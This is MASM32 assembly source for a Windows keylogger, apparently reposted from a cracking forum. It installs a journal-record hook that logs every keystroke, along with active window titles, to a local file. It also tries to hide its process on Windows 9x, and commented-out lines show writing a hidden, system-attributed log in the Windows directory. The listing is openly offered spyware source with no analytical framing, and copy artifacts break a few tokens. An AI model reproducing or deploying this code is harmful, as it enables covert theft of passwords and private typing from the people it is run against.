来源(白菜乐园)

From: http://www.crackbest.org/read.php?tid=19

.486
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib

JournalLogHook PROTO WORD, WORD, WORD

.data
bracket1 db "<"
bracket2 db ">"
linefeed db 13,10,13,10,"[> %s <]",13,10,0;
isLogging dd 1
vKey dd 0
nScan dd 0
dwCount dd 0
schar db 2 dup (0)
logfileN db "Key.txt", 16 dup(0)
kernel_name db "kernel32.dll", 0
kernel_function db "RegisterServiceProcess", 0

.data?
logfile db 261 dup (?)
hinstance HINSTANCE ?
aMsg MSG <?>
LogHook dd ?
svBuffer dword ?
WinDir db 35 dup(?)
MyPath db 256 dup(?)
kBuffer db 256 dup (?)
kFwin db 256 dup (?)
kGkl db 256 dup (?)
wBuffer db 512 dup (?)
chcount dd ?
dwBytes dd ?
aFocus dd ?
lFocus dd ?
lastvKey dd ?

.code
JournalLogHook proc uses edi code WORD, wParam:WPARAM, lParam:LPARAM
    LOCAL filehandle:dword
    .if code < 0
        invoke CallNextHookEx, LogHook, code, wParam, lParam
        ret
    .endif
    .if code == HC_ACTION
        mov edi, lParam
        assume editr EVENTMSG
        .if [edi].message == WM_KEYDOWN
            mov eax, [edi].paramL
            mov ah, 0
            mov vKey, eax
            mov eax, [edi].paramL
            mov al, 0
            shl eax, 8
            mov nScan, eax
            ;invoke GetModuleFileName, 0, addr MyPath, sizeof MyPath
            ;invoke GetWindowsDirectory, addr WinDir, 35; or {GetSystemDirectory}
            ;invoke lstrcat, addr WinDir, addr logfileN
            ;invoke lstrcmpi, addr MyPath, addr WinDir
            ;invoke CreateFile, addr WinDir,GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_ALW AYS,FILE_ATTRIBUTE_HIDDEN + FILE_ATTRIBUTE_SYSTEM,NULL
            invoke CreateFile, addr logfileN,GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_A LWAYS,FILE_ATTRIBUTE_NORMAL,NULL; TEST
            mov filehandle, eax
            invoke SetFilePointer, filehandle,NULL, NULL, FILE_END
            invoke GetKeyNameText, nScan,addr svBuffer, 256
            mov dwCount, eax
            invoke GetActiveWindow
            mov aFocus, eax
            .if eax != lFocus
                mov lFocus, eax
                invoke GetWindowText, aFocus, addr kBuffer, 256
                mov chcount, eax
                .if chcount > 0
                    invoke wsprintf, addr wBuffer, addr linefeed, addr kBuffer
                    invoke lstrlen, addr wBuffer
                    mov chcount, eax
                    invoke WriteFile, filehandle, addr wBuffer, chcount, addr dwBytes, NULL
                .endif
            .endif
            .if dwCount > 0
                .if vKey == VK_SPACE
                    mov svBuffer, 32
                    mov svBuffer + 1, 0
                    mov dwCount, 1
                .endif
                .if vKey == VK_CAPITAL
                    mov svBuffer,0
                    mov dwCount,1
                .endif
                .if vKey == VK_SHIFT
                    mov svBuffer,0
                    mov dwCount,1
                .endif
                .if dwCount == 1
                    .if lastvKey != 186
                        invoke GetKeyboardState, addr kBuffer
                        invoke GetForegroundWindow
                        invoke GetWindowThreadProcessId,eax,0
                        invoke GetKeyboardLayout ,eax;
                        invoke ToAsciiEx, vKey, nScan, addr kBuffer, addr schar, 0 ,eax
                        mov chcount, eax
                    .else
                        mov chcount, 1
                        mov eax, vKey
                        mov schar, al
                    .endif
                    .if chcount > 0
                        invoke WriteFile, filehandle, addr schar, chcount, addr dwBytes, NULL
                    .endif
                .else
                    invoke WriteFile, filehandle, addr bracket1, 1, addr dwBytes, NULL
                    invoke WriteFile, filehandle, addr svBuffer, dwCount, addr dwBytes, NULL
                    invoke WriteFile, filehandle, addr bracket2, 1, addr dwBytes, NULL
                    .if vKey == VK_RETURN
                        invoke WriteFile, filehandle, addr linefeed, 2, addr dwBytes, NULL
                    .endif
                .endif
                mov eax, vKey
                mov lastvKey, eax
            .endif
            invoke CloseHandle, filehandle
        .endif
    .endif
    invoke CallNextHookEx, LogHook, code, wParam, lParam
    ret
JournalLogHook endp

start:
    ;try to hide only 9x
    invoke GetModuleHandle, ADDR kernel_name
    invoke GetProcAddress, eax, ADDR kernel_function
    .if eax != NULL
        push 1
        push 0
        call eax
    .endif
    invoke GetModuleHandle, NULL
    ;----------------------------
    mov hinstance, eax
    invoke SetWindowsHookEx, WH_JOURNALRECORD,addr JournalLogHook,hinstance, NULL
    mov LogHook, eax
    .while isLogging == 1
        invoke WaitMessage
        invoke GetMessage, addr aMsg, NULL, 0, 0
        .if aMsg.message == WM_CANCELJOURNAL
            mov edi, offset kBuffer
            mov ecx, 64
            xor eax, eax
            rep stosd
            invoke SetKeyboardState, addr kBuffer
            invoke SetWindowsHookEx, WH_JOURNALRECORD,addr JournalLogHook,hinstance, NULL
            mov LogHook, eax
        .endif
    .endw
    invoke UnhookWindowsHookEx,addr LogHook
    invoke ExitProcess, 0
end start

Link: http://www.asm32.net/article_details.aspx?id=5232